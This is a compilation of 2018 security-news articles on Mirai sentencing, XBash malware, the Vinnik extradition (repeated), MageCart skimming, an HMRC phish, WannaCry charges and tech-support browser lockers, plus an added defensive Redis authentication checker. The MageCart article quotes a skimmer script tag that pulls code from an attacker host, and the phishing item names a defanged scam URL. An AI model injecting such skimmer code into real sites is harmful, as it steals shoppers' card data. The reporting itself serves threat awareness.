“U.S. Attorney Bryan Schroder announced today that three defendants have been sentenced for their roles in creating and operating two botnets, which targeted “Internet of Things” (IoT) devices.  Paras Jha, 22, of Fanwood, New Jersey; Josiah White, 21, of Washington, Pennsylvania; and Dalton Norman, 22, of Metairie, Louisiana, were sentenced today by Chief U.S. District Judge Timothy M. Burgess.” states the press release published by the DoJ.

“On Dec. 8, 2017, Jha, White, and Norman pleaded guilty to criminal Informations in the District of Alaska charging them each with conspiracy to violate the Computer Fraud & Abuse Act in operating the Mirai Botnet.  Jha and Norman also pleaded guilty to two counts each of the same charge, one in relation to the Mirai botnet and the other in relation to the Clickfraud botnet.”

On Tuesday, the DoJ revealed that each of the men was sentenced to five years of probation and 2,500 hours of community service.

The judge ordered them to pay $127,000 in restitution, and they voluntarily handed over significant amounts of cryptocurrency that the authorities seized during the investigation into the botnet.

The three men have “cooperated extensively” with the authorities helping the FBI on complex cybercrime investigations before the sentence. The trio will continue to offer their support to the feds.

“After cooperating extensively with the FBI, Jha, White, and Norman were each sentenced to serve a five-year period of probation, 2,500 hours of community service, ordered to pay restitution in the amount of $127,000, and have voluntarily abandoned significant amounts of cryptocurrency seized during the course of the investigation.” continues the press release.

“As part of their sentences, Jha, White, and Norman must continue to cooperate with the FBI on cybercrime and cybersecurity matters, as well as continued cooperation with and assistance to law enforcement and the broader research community.”

Pierluigi Paganini

(Security Affairs – Mirai, botnet)

The post Mirai authors avoid the jail by helping US authorities in other investigations appeared first on Security Affairs.


Kaspersky: Attacks on Smart Devices Rise Threefold in 2018

Attacks against smart devices are surging, with both old and new threats targeting connected devices that remain largely unsecured, according to researchers at Kaspersky Lab. Kaspersky researchers observed three times as many malware samples against smart devices in the first half of 2018 as they did in all of 2017, according to new findings...

Blog | Avast EN: The NUUO Peekaboo vulnerability gives hackers your camera feed | Avast

New vulnerabilities found in NUUO surveillance software can put cybercriminals in the director’s chair. When exploited through a stack buffer overflow, the Peekaboo vulnerability grants hackers full control over the surveillance video. Assuming control remotely, a hacker can tamper with the recording, tamper with the feed itself, and generally execute any code he or she wants in the software. This major security flaw is reportedly present in hundreds of thousands of devices around the world, such as the NUUO NVRMini2, a network-attached storage (NAS) device.




SecurityWeek RSS Feed: Symantec Launches Free Election Security Service

Symantec on Tuesday announced the launch of a new service that aims to make elections more secure by helping candidates and political organizations improve their security posture and detect fake websites.


New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms

Palo Alto Networks researchers discovered a new malware, tracked as XBash, that combines features from ransomware, cryptocurrency miners, botnets, and worms.

Security researchers at Palo Alto Networks have discovered a new piece of malware, dubbed Xbash, that targets both Linux and Microsoft Windows servers.

Xbash was developed in Python; the authors then converted it into self-contained Linux ELF executables using the legitimate tool PyInstaller for distribution.

The malicious code combines features from different families of malware such as ransomware, cryptocurrency miners, botnets, and worms.

“Xbash has ransomware and coinmining capabilities. It also has self-propagating capabilities (meaning it has worm-like characteristics similar to WannaCry or Petya/NotPetya).” reads the analysis published by Palo Alto Networks.

“It also has capabilities not currently implemented that, when implemented, could enable it to spread very quickly within an organizations’ network (again, much like WannaCry or Petya/NotPetya).”

The malicious code was attributed to a popular crime gang tracked as the Iron Group.

The Iron cybercrime group has been active since at least 2016 and is known for the Iron ransomware, but over the years it has built various strains of malware, including backdoors, cryptocurrency miners, and ransomware, targeting both mobile and desktop systems.

“In April 2018, while monitoring public data feeds, we noticed an interesting and previously unknown backdoor using HackingTeam’s leaked RCS source code.” states the report published by Intezer.

“We discovered that this backdoor was developed by the Iron cybercrime group, the same group behind the Iron ransomware (rip-off Maktub ransomware recently discovered by Bart Parys), which we believe has been active for the past 18 months.”

Thousands of victims have been infected by malware used by the crime gang.

Now the experts from Palo Alto Networks discovered the new XBash malware strain that combines botnet, coinmining, ransomware, and self-propagation. The botnet and ransomware features are observed in infections of Linux systems, while a coinminer behavior was seen in infections of the Windows servers.

The Xbash authors implemented scanning capabilities that the malware uses to search for vulnerable servers online. The malicious code looks for unpatched web applications that are vulnerable to a series of known exploits, or for services that can be brute-forced with a dictionary of default credentials.

“When Xbash finds a destination has Hadoop, Redis or ActiveMQ running, it will also attempt to exploit the service for self-propagation.” continues the report.

“Three known vulnerabilities are targeted:

  1. Hadoop YARN ResourceManager unauthenticated command execution, which was first disclosed in October 2016 and has no CVE number assigned.
  2. Redis arbitrary file write and remote command execution, which was first disclosed in October 2015 and has no CVE number assigned. This is shown below in Figure 6.
  3. ActiveMQ arbitrary file write vulnerability, CVE-2016-3088.”

 

The malware infects Windows systems only after compromising a vulnerable Redis server.

The scanner component also scans the Internet for servers that run services that have been left online exposed without a password or are using weak credentials. The scanners target web servers (HTTP), VNC, MariaDB, MySQL, PostgreSQL, Redis, MongoDB, Oracle DB, CouchDB, ElasticSearch, Memcached, FTP, Telnet, RDP, UPnP/SSDP, NTP, DNS, SNMP, LDAP, Rexec, Rlogin, Rsh, and Rsync.
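Redis appears in both of Xbash’s target lists above: as a service exploited for self-propagation and as one probed for a missing or weak password. The check below is an added Python example, not Palo Alto Networks’ or Xbash’s code: it sends a single RESP PING and classifies the reply, which is enough to tell an unauthenticated listener from one behind requirepass or protected mode. The stand-in server exists only so the check can run offline; it is not Redis, and the example deliberately does not reproduce the file-write technique.

```python
import socket
import threading
from typing import Callable, Dict, Tuple

PING = b"*1\r\n$4\r\nPING\r\n"  # RESP encoding of the PING command


def classify_redis_reply(reply: bytes) -> str:
    """Map the raw reply to an unauthenticated PING onto an exposure verdict."""
    if reply.startswith(b"+PONG"):
        return "open"            # answered with no credentials at all
    if reply.startswith(b"-NOAUTH"):
        return "auth-required"   # requirepass / ACL in effect
    if reply.startswith(b"-DENIED"):
        return "protected-mode"  # Redis refused a non-loopback client
    return "unknown"


def check_redis_auth(host: str, port: int, timeout: float = 3.0) -> str:
    """Connect, send PING without AUTH, and classify what comes back."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(PING)
            reply = s.recv(512)
    except OSError:
        return "unreachable"
    return classify_redis_reply(reply)


def serve_fake_redis(reply: bytes) -> Tuple[int, Callable[[], None]]:
    """One-shot stand-in on 127.0.0.1 that answers any request with `reply`.
    Constructed purely so the check can be exercised offline; it is not Redis.
    Returns the bound port and a function that waits for the server to finish."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(5)

    def run() -> None:
        try:
            conn, _ = srv.accept()
            with conn:
                conn.recv(512)
                conn.sendall(reply)
        except OSError:
            pass
        finally:
            srv.close()

    t = threading.Thread(target=run, daemon=True)
    t.start()
    return srv.getsockname()[1], t.join


def demo() -> Dict[str, str]:
    """Run the check against two simulated configurations."""
    results = {}
    for label, reply in {
        "no-password": b"+PONG\r\n",
        "requirepass": b"-NOAUTH Authentication required.\r\n",
    }.items():
        port, wait = serve_fake_redis(reply)
        results[label] = check_redis_auth("127.0.0.1", port)
        wait()
    return results


if __name__ == "__main__":
    for label, verdict in demo().items():
        print(f"{label:12s} -> {verdict}")
```

Point check_redis_auth at your own inventory rather than the internet: anything that comes back as open and is reachable beyond the host should be bound to localhost or put behind requirepass and a firewall, and renaming or disabling the CONFIG command (a standard Redis hardening step) removes the usual path to writing files from an unauthenticated session.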

The attackers attempt to monetize their efforts through coin-mining on Windows systems or with ransomware-based attacks on Linux servers running database services.

The ransomware component scans for and deletes MySQL, MongoDB, and PostgreSQL databases, then drops a ransom note asking for a payment of 0.02 Bitcoin ($125) to recover them.

Unfortunately, victims will never recover their data, because the malware wipes the databases without backing them up first.

“we have observed three different bitcoin wallet addresses hard-coded in the Xbash samples. Since May 2018, there are 48 incoming transactions to these wallets with total income of about 0.964 bitcoins (about US$6,000 at the time of this writing).” continues the analysis.

“the funds are being withdrawn, showing us that the attackers are actively collecting their ransom.”

Experts noticed that all versions of Xbash contain a Python class named “LanScan” intended to target enterprise networks. The class can gather local intranet information, generate a list of all IP addresses within the same subnet, and port-scan all of those IPs.

This code is not yet active in the malware; the crooks are likely still developing it.

Experts believe Xbash will continue to evolve, for example by adding the miner component to Linux servers as well.

Further information, including IoCs, is reported in the analysis published by the experts.

Pierluigi Paganini

(Security Affairs – malware, cybercrime)

The post New XBash malware combines features from ransomware, cryptocurrency miners, botnets, and worms appeared first on Security Affairs.


SecurityWeek RSS Feed: Altaba Settles Yahoo Breach Lawsuits for $47 Million

Altaba, the investment company that resulted from Verizon’s $4.5 billion acquisition of Yahoo’s Internet business last year, has agreed to settle consumer class action lawsuits triggered by the massive data breaches suffered by Yahoo in the past years.


Security Affairs: Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian national Alexander Vinnik to Russia; the Supreme Civil and Criminal Court of Greece overruled previous decisions.

The Greek authorities have approved the extradition of Russian national Alexander Vinnik to Russia. The decision surprised the media, because the man was expected to be extradited to the US or France, as previously announced.

The decision of the Supreme Civil and Criminal Court of Greece overrules previous rulings by other Greek courts.

Vinnik is wanted by Russia, France, and the United States, and faces different charges in each country.

Greek police arrested the Russian national Alexander Vinnik (38) and accused him of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering involving more than $4 billion worth of Bitcoin (BTC) derived from criminal activities; US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted to extradite Vinnik to the US to face charges of operating an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused of being responsible for the failure of the Japanese bitcoin exchange Mt. Gox. Mt. Gox was the biggest Bitcoin exchange at the time of its shutdown in 2014, which occurred after the platform fell victim to a series of cyber heists totaling $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist: a Greek lower court agreed to extradite Vinnik to France to face charges of hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country would respond.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he faces fraud charges worth around $10,000, practically nothing compared with the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will examine France’s request for extradition on September 19, but its decision could be overruled by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs – Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.




Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia

Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, Supreme Civil and Criminal Court of Greece overruled previous ones.

The Greek authorities have approved the extradition of Russian Alexander Vinnik to Russia, the decision has surprised the media because the man was expected to be extradited in the US or France as previously announces.

The decision of the Supreme Civil and Criminal Court of Greece has overruled previous ones that were taken by other Greek courts.

Russia, France, and the United States, where Vinnik is charged with different hacking crimes.

Greek Police have arrested the Russian national Alexander Vinnik (38) and they accuse the man of running the BTC-e Bitcoin exchange to launder more than US$4bn worth of the cryptocurrency.

The police seized two laptops, two tablets, mobile phones, a router, a camera, and four credit cards.

The authorities reported that since 2011, 7 million Bitcoin went into the BTC-e exchange and 5.5 million withdrawn.

According to the Greek media outlet the Daily Thess, the FBI tracked Alexander Vinnik for more than a year.

The man is charged by the US authorities with fraud and money laundering for more than $4 billion worth amount of Bitcoin (BTC) resulting from criminal activities, the US prosecutors requested his extradition in July 2017.

The Greek Supreme Court first opted out to extradite Vinnink to the US  to face with the charges with the operation of an unlicensed money service business, money laundering, conspiracy to commit money laundering, and engaging in unlawful monetary transactions.

Vinnik is also accused to be the responsible for the failure of the Japanese bitcoin exchange Mt. Gox.
Mt. Gox was the biggest Bitcoin exchange at the time of the shut down in 2014 that occurred after the platform was the victim of a series of cyber heists for a total of $375 million in Bitcoin.

The U.S. authorities speculate the Russian man stole funds from Mt. Gox, with the help of an insider. The stolen funds were transferred to a wallet managed by Vinnik and funds were laundered through his platform BTC-e-service during a three-year period.

In July 2018 there was a twist, a Greek lower court agreed to extradite Vinnik to France to face with charges with hacking, money laundering, extortion and involvement in organized crime.

The Russian Foreign Ministry criticized the ruling and said the country will look to a response.

“Several days after taking an unfriendly decision to expel Russian diplomats and to deny entry to several Russian citizens, they have adopted a decision to extradite Russian citizen Alexander Vinnik to France,” Russia’s Foreign Ministry wrote in a statement. “It is obvious that Russia cannot leave these actions unanswered.”

AlexanderVinnik

The Russian government officially asked the Greek government to extradite Vinnik to Russia, where he is facing around $10,000 worth of fraud charges, practically nothing compared the charges in the US and France.

Now, the decision of the Greek Supreme Court is disconcerting, Vinnik is going to be extradited to Russia.

The Supreme Court will analyze France’s request for extradition on September 19, but its decision could be overrun by the Greek Minister of Justice.

Pierluigi Paganini

(Security Affairs – Vinnik, BTC-e Bitcoin exchange)

The post Greek authorities approved extradition of Russian hacker Alexander Vinnik to Russia appeared first on Security Affairs.

SecurityWeek RSS Feed: Wisconsin Officials Prepare for Potential Election Hackers

A private vendor inadvertently introduces malware into voting machines he is servicing. A hacker hijacks the cellular modem used to transmit unofficial Election Day results. An email address is compromised, giving bad actors the same access to voting software as a local elections official.


HACKMAGEDDON: 16-31 August Cyber Attacks Timeline

Here we go with the second timeline of August, covering the main cyber attacks that occurred between August 16th and August 31st. The timeline suggests that malicious actors decided to end their summer break quite early, as the number of recorded events is considerably higher than in the first timeline.


EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS

The gambling application EOSBet was affected by a vulnerability in its smart contract system that attackers exploited to steal $200,000 worth of EOS.

The security breach was first reported by Reddit user “thbourlove”, a member of the EOSBet community, who shared the code used to exploit the flaw.

After seeing the exploit code, the EOSBet’s official Reddit account admitted the hack.

“Yep, we were hacked. But we also have this exact assertion that you do. I would be careful, it’s a bit deeper than you think.” stated EOSBet’s official Reddit account.


“A million-dollar EOS gambling dApp suffered a major blow, just days after declaring itself to be the safest of its kind.” reported The Next Web website.

“Hackers have taken 40,000 EOS ($200,000) from the operating wallet of EOSBet by exploiting vulnerabilities in its smart contracts.”

The gambling application, which is based on the EOS blockchain, was taken offline in response to the security breach.

“[…] A few hours ago, we were attacked, and about 40,000 EOS was taken from our bankroll,” said an EOSBet spokesperson.

“This bug was not minor as was stated previously, and we are still doing forensics and piecing together what happened.”

According to the company, the attackers exploited a bug in one of its games, but the same issue appears to affect other games on the gambling platform.

The hackers were able to forge a fake hash to hijack EOSBet’s fund transfers.

The attackers attempted to transfer funds to a wallet under their control whose name closely resembles the one used by EOSBet.

The hackers made only a limited number of transactions from a number of accounts, using the following message, or a similar one, as the memo:

“Memo: Please refund the illegal income eos, otherwise we will hire a team of lawyers in China to pursue all criminal liability and losses to you. Eosbet official eos account: eosbetdicell.”

The crooks then distributed the gains, splitting them across many wallets that each received small amounts of EOS tokens with the following message:

“Memo: Dear players: In order to make up for the loss of eosbet players in the hacking incident, the platform launched a recharge to send BET. 1EOS=1BET, the official eos account: eosbetdicell, the transfer will automatically give the same BET.”

It is still unclear whether this incident is connected to a suspicious win by a gambler last week, when a player claimed over $600,000 from EOSBet by repeatedly doubling their money over 36 hours.

Platform managers ruled out any link between the hack and what they consider a legitimate win.

Pierluigi Paganini

(Security Affairs – EOSBet, security breach)

The post EOSBet Gambling application hacked, crooks stole $200,000 worth of EOS appeared first on Security Affairs.


Feedify cloud service architecture compromised by MageCart crime gang

MageCart cyber gang compromised the cloud service firm Feedify and stole payment card data from customers of hundreds of e-commerce sites.

The MageCart crime gang appears very active in this period: payment card data from customers of hundreds of e-commerce websites may have been stolen following the compromise of the cloud service firm Feedify.

Feedify has over 4,000 customers; it is a cloud platform that lets its customers engage their own clients with tools that target them based on their behavior.

Feedify relies on a JavaScript snippet that its customers add to their websites to use the service. MageCart hackers compromised the supply chain for the Feedify service: the snippet loads various resources from Feedify’s infrastructure, including a library named “feedbackembad-min-1.0.js,” which was compromised by MageCart.


Every visitor to a page on a Feedify customer’s e-commerce site loaded the malicious script, which allowed the crooks to siphon personal information and payment card data.

The group has been active since at least 2015 and compromised many e-commerce websites to steal payment card and other sensitive data.

The group injects a skimmer script into target websites to siphon payment card data: once the attackers compromise a site, they add an embedded piece of JavaScript to the HTML template. Below is an example, the script tag used by the skimmer dubbed MagentoCore.

<script type="text/javascript" src="hxxps://magentocore.net/mage/mage.js"></script>

This script records keystrokes from customers and sends them to a server controlled by the attackers.

Typically hackers attempt to compromise third-party features that could allow them to access a large number of websites.

According to the security firm RiskIQ, the MageCart group carried out a targeted attack against British Airways and used a customized version of the script to stay under the radar.

Using the same tactic, MageCart compromised websites using the Feedify service by injecting malicious code into a library that the Feedify script served to customers’ websites.

According to the experts from RiskIQ, MageCart hackers might have had access to the Feedify servers for nearly a month.

Once notified of the compromise, Feedify removed the malicious script, but apparently the hackers re-infected the library.

The events demonstrate the MageCart crime gang’s ability to compromise the infrastructure of its victims.

In August, security expert Willem de Groot discovered that the MagentoCore skimmer had at that time already infected 7,339 Magento stores.

At the time, a query of the PublicWWW service showed the MagentoCore script deployed on 5,214 domains; the number of compromised websites is still high (4,762) despite the awareness campaign.

Pierluigi Paganini

(Security Affairs – cybercrime, MageCart)

The post Feedify cloud service architecture compromised by MageCart crime gang appeared first on Security Affairs.


HMRC phish swipes email login, payment details

It’s not tax season in the UK, but that hasn’t deterred scammers from sending out mail looking to swipe both card details and email logins in one fell swoop.

The email, which claims UKGOV has issued a tax refund to the tune of 542.94 GBP, arrives under the following title, which is spectacularly poorly formatted:

[RCPT-07010144] processed your automatic payment is available – “Subscription- 10 SEPTEMBER 2018″[Email No.’6922′]

The body content states that recipients can reclaim the cash by logging in on their “gateway portal.” Better make haste though, as (in our case) the mail has a same day expiration date for the ability to put in a claim.

Fake email


Typically, we tend to see time limits of a few days on fake mails such as this one, so they’re really relying on pressure to get the job done here. We suspect anyone else receiving one of these will find themselves faced with a similarly pressing deadline.

Unlike many boilerplate tax phishes, we’re not sent directly to a fake HMRC page to enter card details.

With this scam, the first point of entry is on an imitation Outlook login, where potential victims are asked for their email address and password.

The scam site is located at:

onlinehmrevnue(dot)from-tx(dot)com/webGBTxid/checkValidation(dot)php

Fake HMRC phish login


Fake login


Once the email details have been harvested, they’re then taken to a rather threadbare HMRC phish. There are no splash screens or fake logins or anything remotely resembling the process of having to sign into the so-called gateway portal. Instead, it’s just a page full of boxes to be filled with name, address, city, phone number, DOB, mother’s maiden name, and then full credit card information, just to round things off.

HMRC phish card harvesting


The site performs a basic validation check on some of the information entered. The reason for this is so the scammers can be reasonably confident that the person on the other side of the screen entered accurate information. They also gain some (slight) protection from doing this; you can’t enter some fake details to waste the scammer’s time, because when you hit the credit card number section, it’ll probably just prevent you from going any further.

Validation check


You could probably still do it given enough time, but they’re likely banking on most people giving up and simply moving on instead. Make no mistake, a site such as the above is expressly geared toward nothing but the victim.

While these scams tend to experience a boom period during tax season (in this case, around April for the US and UK), there’s nothing preventing scammers from firing these out at other times of the year. In fact, it might be more of a benefit for them to do so. Recipients may be more likely to have their guard down due to the lack of “fake tax refund” articles making the rounds. Out of sight, out of mind and all that.

If you receive a mail similar to the above and you’re not sure if it’s real or not, the HMRC website has a number of pages giving advice on these specific situations. The main one to check out would be their phishes and frauds page, where you can see the type of correspondence they send out, and when they do (or don’t) send refund notices, as well as the method of said notification. They also provide some examples of phishing emails with their name on it.

One thing is for certain: You definitely won’t be sent from an HMRC refund email to an Outlook login. Don’t fall victim to a scam such as this, or you’ll have to chase down your bank and your email provider. If you have any logins tied to the compromised email account, you may have to play clean up for those, too.

Never underestimate how much trouble a fairly crude, simple phish can cause—it doesn’t take much to cause endless financial headaches and a large bundle of password resets.

The post HMRC phish swipes email login, payment details appeared first on Malwarebytes Labs.

Greek Supreme Court Approves Russian Request for Bitcoin Suspect

Greece's Supreme Court on Friday ruled that a Russian held in Greece for allegedly laundering $4 billion using the bitcoin digital currency should be extradited to Russia, a court source said.

Alexander Vinnik, who headed bitcoin exchange BTC-e, has been held in jail since his arrest last July in the northern Greek tourist resort of Halkidiki.


Tech support scammers leverage “evil cursor” technique to “lock” Chrome

Tech scammers are constantly coming up with new techniques to make users panic and seek their bogus services. The latest one, documented by Malwarebytes researchers, has been dubbed “evil cursor”. The trick works against a recent version of Google Chrome (69.0.3497.81) and prevents victims from closing a tab or browser window by clicking on the “X” in the upper right corner. The victims believe that they are pressing the “X”, but code …

The post Tech support scammers leverage “evil cursor” technique to “lock” Chrome appeared first on Help Net Security.

North Korean hacker officially charged for the WannaCry attacks


Last month, we warned of the dangers that the FBI’s most wanted cybercriminals pose. Among these criminals are the perpetrator of the cyberattacks against HBO and the developer of the Zeus malware. And there is now a new name at the top of the list.

That name is Park Jin Hyok, who has officially been charged by the US Department of Justice with carrying out the WannaCry attacks, among other cybercrimes.

According to the investigators, Park works for a company called Korean Expo Joint Venture, a front for the Korean government that, alongside illegal activities, also carries out legitimate software and IT support. Apart from working in this company, Park allegedly belongs to the hacking group known, among other names, as Lazarus Group – a group that has carried out numerous cyberattacks against South Korea.

One of the clues that helped track down Park was his use of free email services such as Gmail, which he used both for legitimate business at his company, and to carry out phishing attacks and other crimes.

As well as the criminal charges, the Treasury Department has announced that it will impose sanctions against Park and against the company. In a statement, it said, “North Korea has demonstrated a pattern of disruptive and harmful cyber activity that is inconsistent with the growing consensus on what constitutes responsible state behavior in cyberspace.”

While it is unlikely that Park will ever be handed over to the US authorities, according to Martyn Williams, a journalist specialized in North Korean affairs, it is a symbolic step by the American government: an official accusation against the North Korean government is a rare move.

A long criminal record

The most notorious cybercrime of which Park is accused is WannaCry, the 2017 global ransomware attack that affected computers in over 150 countries, and had an estimated cost of up to $4 billion worldwide.

Another accusation is that he was behind the 2014 hack of Sony Pictures. This attack was carried out using a piece of malware called Destover. During the incident, 100 terabytes of information was leaked, including personal emails, films, information about salaries, and scripts of future films.

Suspicions about this attack already fell on North Korea at the time, due in part to the fact that one of the attackers’ demands was the withdrawal of the film ‘The Interview’, in which two journalists attempt to assassinate the North Korean leader, Kim Jong Un.

Along with these cyberattacks, he is also accused of being involved in the 2016 robbery of the Bangladesh Central Bank. Using sophisticated malware to gain visibility into the IT system, the attackers were able to observe how the bank’s operations worked. With this information, they carried out fraudulent transactions worth $850 million. According to the FBI report, the malware could have got onto the system through a version of the BEC scam [p. 58 of the report].

Although the bank was able to recover a large part of the money – it is estimated that the bank’s total loss was around $81 million – it was still one of the largest thefts of this type in history.

How to keep your company safe from the most wanted cybercriminals

One of the main reasons to hire a cybersecurity solution for your company is to gain time: having the right tools to be able to react immediately to a cyberattack can make the difference between being a victim and staying safe.

One way to do so is to have a cybersecurity suite that provides an active search for threats. This way, the company can stay ahead of cybercriminals and react before an attack takes place. This is exactly what Panda Adaptive Defense 360’s Threat Hunting service does.

This managed service from Panda provides visibility of all activity on the corporate network, so that you know exactly what is happening at all times. Adaptive Defense 360 classifies 99.98% of processes via machine learning, and the remaining 0.02% are classified by Panda’s expert cybersecurity analysts. Advanced technologies like this allowed Panda to protect all clients with Adaptive Defense installed in Lock mode from WannaCry. It is an advanced cybersecurity solution that is still protecting the endpoints of companies all over the world.

The post North Korean hacker officially charged for the WannaCry attacks appeared first on Panda Security Mediacenter.

Partnerstroka: Large tech support scam operation features latest browser locker

Tech support scams continue to be one of the top consumer threats in 2018, despite actions from security vendors and law enforcement. Scammers are constantly looking for new ways to reel in more victims, going beyond cold calls impersonating Microsoft to rogue tech support ads using the good name of legitimate brands, and of course, malicious pop-ups.

We have been monitoring a particular tech support scam campaign for some time which, like several others, relies on malvertising to redirect users to the well-known browser locker (browlock) pages. While it is common for crooks in this industry to reuse design templates, we were still able to isolate incidents pertaining to this group, which we have been tracking under the name Partnerstroka.

However, we recently caught up with the same campaign again and noticed that the fake alert pages contained what seemed to be a new browlock technique designed specifically for Google Chrome. In this blog post, we share some of our findings on this group and their latest techniques.

Identification

The browser locker is typical of those we normally see, but the crooks have ensured that most browsers and operating systems are covered with their own landing page. This is determined by looking at the user-agent string when the client requests the page from the malicious server. It is further customized via JavaScript functions that perform the “locking” part of the scam.

Different templates for the same browlock domain

The name we track this campaign under is inspired by the string “stroka” found within the HTML source code. That same string (and similar code) was also present in previous JavaScript-based “Police Browlocks” that required users to pay a fine with vouchers. However, because code reuse is common among scammers, it is likely to be an entirely different group.

Campaign identification via redirects, TLD and registrar

The threat actors use dozens of Gmail accounts following a somewhat predictable pattern.

Registrants emails tied to the Partnerstroka campaign

Each email address is tied to anywhere from a few to several hundred .club (gTLD) browlock domains abusing the GoDaddy registrar/hosting platform, with whom we have shared our investigation.

A view of the domains belonging to one email address

We were able to extract over 16,000 malicious domains during a period of several months, but we believe the actual number is much higher. Indeed, our visibility into the depth of this campaign was partly tied to the email addresses we had cataloged, and unfortunately the new privacy laws around whois records hindered our research.

Traffic distribution

We observed different techniques to redirect unsuspecting users to the browlock pages, although malvertising was almost always an element in the chain. The likelihood of getting redirected to one of these browlocks is higher when visiting websites that have less than optimal advertising practices.

BlackTDS

BlackTDS is a Traffic Distribution System (TDS) used by crooks to deliver web threats and filter out unwanted traffic (i.e., visitors that are not real humans). The traffic that comes out of it is sent to anything from social engineering attacks to infections via exploit kits.

The Partnerstroka group used various ad networks to drive visitors to the browlock page, sometimes directly but often through an intermediary .info gate.

BlackTDS traffic, malvertising, .info gate, and .club browlock

Decoy sites

Another technique the threat actors leveraged was redirects via decoy portals performing what we call “cloaking,” a trick used to only serve malicious content to certain kinds of users and redirect others (non targets) to a benign-looking page instead.

Traffic from decoy sites leading to .club browlock

Blogspot redirects

We also came across a number of blogs hosted on Blogger (now owned by Google). These were either empty or only showed limited content, and again, their purpose was to perform redirects to the browlock pages.

Rogue Blogspot pages used for redirects

Studying their redirection chain more closely, we found something interesting in how the browlock domain was being called. They used a marketing platform in between that would respond with the latest registered browlock domain:

Redirect from Blogspot to the browlock

Malvertising via injected sites

The majority of activity we are observing lately comes from websites that have been injected with ad code. While some website owners do this purposely to monetize their traffic, it becomes a lot more suspicious when we find matching ad campaign identifiers across domains that have seemingly nothing in common. Thanks to @baberpervez2 for providing recent malvertising chains.

Browser locker for Edge on Windows 10 from a malvertising chain

The evil cursor

There are many documented techniques that can be used to prevent users from closing a tab or browser window, and often they are specific to each browser. For instance, Edge and Firefox users will often get the authentication-required prompt in a loop, while Chrome users are served nastier tricks, such as actual attempts to freeze the browser or trigger thousands of downloads.

In early September, we came across the Partnerstroka group again and noticed that they had incorporated a browser locker technique that worked against the latest version of Google Chrome (69.0.3497.81). Similar to other tricks, it effectively prevented users from closing the offending page because the mouse cursor had been hijacked.

As can be seen in the animation above, the red dot represents what the user actually clicks on, even though the cursor itself seems to be way off. The code responsible for this unwanted behavior can be found within the HTML body tag:

A few lines of code to alter the mouse cursor

The Base64 blob decodes to a simple image of a low-resolution mouse cursor, but the important bit is the 128×128 transparent pixel area, which essentially turns your cursor into a large box. We reported this issue via the Chromium bug tracker portal, and the first person who replied showed what that custom “evil” cursor looks like:

The new cursor showing an actual (invisible) square

This is one example of many such tricks that can be used against modern browsers. Often times, features that are either well-documented or more obscure turn into attack vectors used to further fool end users, causing them to dial up the scammers for assistance. Indeed, the sound of an alert and a browser that appears to be completely locked up triggers panic for many people. These are essentially the same scare tactics that have been used for ages and still work well.

Similar campaigns

We have noted an increase in tech support scams abusing the NameCheap registrar. While we cannot positively identify that this is also the Partnerstroka group (landing page reuse among scammers is a thing), they definitely share some common traits.

Domain Name: ukxhdp[.]club
Registrar URL: http://www.namecheap.com
Creation Date: 2018-08-21T15:06:23Z

Browlock using the same cursor trick with a domain registered via Namecheap

Domain Name: descorservicesavailoffer[.]club
Registrar URL: http://www.namecheap.com
Creation Date: 2018-08-22T12:16:07Z

Browlock hosted on AWS S3 bucket

Mitigations

Due to the size and ever-changing nature of the infrastructure between different browser locker campaigns, applying a domain/IP database approach against them is not an effective solution. Although it does offer some coverage, scammers are always a step ahead because of their ability to register new (yet to be detected) domain names.

Here at Malwarebytes, we tackle this issue using both blacklists and, more importantly, heuristic techniques. Our browser extension (Beta) can detect and prevent browlocks:

Browlock stopped via the Malwarebytes extension

Tech support scams have been going on for some time and followed various trends over the years. While social engineering is their main leverage, they often incorporate techniques that help with that effort. We can expect crooks to keep coming up with clever ways to disrupt the browsing experience and abuse advertising, registration, and hosting platforms along the way.

As defenders, we must also face new challenges in tracking threat actors that benefit from changes brought about by privacy protection laws. As we adapt to these new realities, sharing threat intelligence with involved parties becomes more important than ever to tackle the problem at a larger scale.

Indicators of Compromise


The post Partnerstroka: Large tech support scam operation features latest browser locker appeared first on Malwarebytes Labs.

British Airways hackers used same tools behind Ticketmaster breach

The British Airways web hack wasn't an isolated incident. Analysts at RiskIQ have reported that the breach was likely perpetrated by Magecart, the same criminal enterprise that infiltrated Ticketmaster UK. In both cases, the culprits used similar virtual card skimming JavaScript to swipe data from payment forms. For the British Airways attack, it was just a matter of customizing the scripts and targeting the company directly instead of going through compromised third-party customers.

Via: The Verge

Source: RiskIQ

Could the Photos You’re Sharing Online Be Putting Your Child at Risk?

